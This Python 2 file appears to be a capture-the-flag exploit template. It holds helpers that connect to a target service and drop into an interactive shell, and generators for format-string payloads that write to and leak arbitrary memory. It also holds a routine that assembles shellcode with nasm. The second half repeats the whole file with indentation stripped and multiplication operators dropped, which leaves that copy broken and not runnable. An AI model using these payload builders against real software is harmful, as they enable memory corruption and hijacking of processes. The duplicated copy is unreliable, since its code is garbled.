hhc0null/exploit_template.py

## exploit_template.py
#!/usr/bin/env python2

import binascii
import collections
import hashlib
import itertools
import numpy
import re
import shlex
import socket
import string
import struct
import subprocess
import sys
import telnetlib
import time


def read_until(f, delim='\n'):
    data = ""
    while not data.endswith(delim):
        data += f.read(1)
    return data

def connect(rhp=("localhost", 1919)):
    s = socket.create_connection(rhp)
    f = s.makefile('rw', bufsize=0)
    return s, f

def interact(s):
    t = telnetlib.Telnet()
    t.sock = s

    print "[+] 4ll y0U n33D 15 5h3ll!!"
    t.interact()

def p(x, t="<I"):
    return struct.pack(t, x)

def u(x, t="<I"):
    return struct.unpack(t, x)[0]

def unsigned(x):
    return u(p(x, t="<i"), t="<I")

def fsb_overwrite(index, pairs):
    # convert pairs of address and value to the dataset
    dataset = dict()
    for address, value in pairs:
        x, y = struct.unpack("<HH", struct.pack("<I", value))
        if x not in dataset.keys():
            dataset[x] = set()
        dataset[x].add(address)
        if y not in dataset.keys():
            dataset[y] = set()
        dataset[y].add(address+2)
    dataset = collections.OrderedDict(sorted(dataset.iteritems()))

    # prepare an address part
    addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
    addresses = struct.pack("<"+"I"*len(addresses), *addresses)
    mark = addresses[-4:]

    # prepare format part
    count = 1
    while True:
        formats, previous = "", 0
        for value in dataset.iterkeys():
            if value != 0:
                formats += "%{}x".format(value-previous)
            formats += "%{}$hn".format('#'*count)*len(dataset[value])
            previous = value
        padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
        index_format_ends = index + (formats+padding+addresses).index(mark)/4
        digit = int(numpy.log10(index_format_ends)) + 1
        if count == digit:
            break
        count += 1
    rgx = re.compile("#"*count)
    index_format_begins = index_format_ends - len(addresses)/4 + 1

    # replace substitutions with index of each address
    original_formats_length = len(formats)
    substitution = re.search(rgx, formats)
    while substitution:
        start, end = substitution.start(), substitution.end()
        formats = formats[:start]+str(index_format_begins)+formats[end:]
        index_format_begins += 1
        substitution = re.search(rgx, formats)
    padding += "P"*(original_formats_length-len(formats))

    # finally, generate the payload
    payload = formats + padding + addresses

    return payload

def fsb_dataleak(index, pairs):
    # prepare a dataset which has leekee as address and leek size as number.
    dataset = dict(pairs)

    # prepare format part
    mark = struct.pack("<I", dataset.keys()[-1])
    addresses = "".join(struct.pack("<"+"I"*len(dataset.keys()), *dataset.keys()))
    count = 1
    while True:
        formats = ""
        for address in dataset.iterkeys():
            formats += "%{}${}s".format('#'*count, dataset[address])
        padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
        index_format_ends = index + (formats+padding+addresses).index(mark)/4
        if count == int(numpy.log10(index_format_ends)) + 1:
            break
        count += 1

    # replace substitutions with index of each address
    rgx = re.compile("#"*count)
    original_formats_length = len(formats)
    index_format_begins = index_format_ends - len(dataset.keys()) + 1
    substitution = re.search(rgx, formats)
    while substitution:
        start, end = substitution.start(), substitution.end()
        formats = formats[:start]+str(index_format_begins)+formats[end:]
        index_format_begins += 1
        substitution = re.search(rgx, formats)

    # compensate the padding length.
    padding += "P"*(original_formats_length-len(formats))

    return formats + padding + addresses

def fsb_stackleak(data, write=True):
    data = data.replace('(nil)', '0x0')
    data = data.split('0x')[1:]
    stack = map(lambda x: int('0x'+x, 16), data)
    if write:
        print map(lambda x: "0x%08x"%(x), stack)
    return stack

def gen_shellcode(source, bits=32):
    source = "".join([
        "BITS %d\n"%(bits),
        source,
        ])
    filename = hashlib.md5(source).hexdigest()
    with open("/tmp/%s.s"%(filename), "wb") as f:
        f.write(source)
    subprocess.call("nasm /tmp/%s.s -o /tmp/%s"%(filename, filename), shell=True)
    with open("/tmp/%s"%filename, "rb") as f:
        shellcode = f.read()
    return filename, shellcode

def message(message_type, message_body, value=None):
    text = ""
    if value:
        text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
    else:
        text = "[{}] {}".format(message_type, message_body)
    print text
	#!/usr/bin/env python2

	import binascii
	import collections
	import hashlib
	import itertools
	import numpy
	import re
	import shlex
	import socket
	import string
	import struct
	import subprocess
	import sys
	import telnetlib
	import time


	def read_until(f, delim='\n'):
	data = ""
	while not data.endswith(delim):
	data += f.read(1)
	return data

	def connect(rhp=("localhost", 1919)):
	s = socket.create_connection(rhp)
	f = s.makefile('rw', bufsize=0)
	return s, f

	def interact(s):
	t = telnetlib.Telnet()
	t.sock = s

	print "[+] 4ll y0U n33D 15 5h3ll!!"
	t.interact()

	def p(x, t="<I"):
	return struct.pack(t, x)

	def u(x, t="<I"):
	return struct.unpack(t, x)[0]

	def unsigned(x):
	return u(p(x, t="<i"), t="<I")

	def fsb_overwrite(index, pairs):
	# convert pairs of address and value to the dataset
	dataset = dict()
	for address, value in pairs:
	x, y = struct.unpack("<HH", struct.pack("<I", value))
	if x not in dataset.keys():
	dataset[x] = set()
	dataset[x].add(address)
	if y not in dataset.keys():
	dataset[y] = set()
	dataset[y].add(address+2)
	dataset = collections.OrderedDict(sorted(dataset.iteritems()))

	# prepare an address part
	addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
	addresses = struct.pack("<"+"I"len(addresses), addresses)
	mark = addresses[-4:]

	# prepare format part
	count = 1
	while True:
	formats, previous = "", 0
	for value in dataset.iterkeys():
	if value != 0:
	formats += "%{}x".format(value-previous)
	formats += "%{}$hn".format('#'count)len(dataset[value])
	previous = value
	padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
	index_format_ends = index + (formats+padding+addresses).index(mark)/4
	digit = int(numpy.log10(index_format_ends)) + 1
	if count == digit:
	break
	count += 1
	rgx = re.compile("#"*count)
	index_format_begins = index_format_ends - len(addresses)/4 + 1

	# replace substitutions with index of each address
	original_formats_length = len(formats)
	substitution = re.search(rgx, formats)
	while substitution:
	start, end = substitution.start(), substitution.end()
	formats = formats[:start]+str(index_format_begins)+formats[end:]
	index_format_begins += 1
	substitution = re.search(rgx, formats)
	padding += "P"*(original_formats_length-len(formats))

	# finally, generate the payload
	payload = formats + padding + addresses

	return payload

	def fsb_dataleak(index, pairs):
	# prepare a dataset which has leekee as address and leek size as number.
	dataset = dict(pairs)

	# prepare format part
	mark = struct.pack("<I", dataset.keys()[-1])
	addresses = "".join(struct.pack("<"+"I"len(dataset.keys()), dataset.keys()))
	count = 1
	while True:
	formats = ""
	for address in dataset.iterkeys():
	formats += "%{}${}s".format('#'*count, dataset[address])
	padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
	index_format_ends = index + (formats+padding+addresses).index(mark)/4
	if count == int(numpy.log10(index_format_ends)) + 1:
	break
	count += 1

	# replace substitutions with index of each address
	rgx = re.compile("#"*count)
	original_formats_length = len(formats)
	index_format_begins = index_format_ends - len(dataset.keys()) + 1
	substitution = re.search(rgx, formats)
	while substitution:
	start, end = substitution.start(), substitution.end()
	formats = formats[:start]+str(index_format_begins)+formats[end:]
	index_format_begins += 1
	substitution = re.search(rgx, formats)

	# compensate the padding length.
	padding += "P"*(original_formats_length-len(formats))

	return formats + padding + addresses

	def fsb_stackleak(data, write=True):
	data = data.replace('(nil)', '0x0')
	data = data.split('0x')[1:]
	stack = map(lambda x: int('0x'+x, 16), data)
	if write:
	print map(lambda x: "0x%08x"%(x), stack)
	return stack

	def gen_shellcode(source, bits=32):
	source = "".join([
	"BITS %d\n"%(bits),
	source,
	])
	filename = hashlib.md5(source).hexdigest()
	with open("/tmp/%s.s"%(filename), "wb") as f:
	f.write(source)
	subprocess.call("nasm /tmp/%s.s -o /tmp/%s"%(filename, filename), shell=True)
	with open("/tmp/%s"%filename, "rb") as f:
	shellcode = f.read()
	return filename, shellcode

	def message(message_type, message_body, value=None):
	text = ""
	if value:
	text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
	else:
	text = "[{}] {}".format(message_type, message_body)
	print text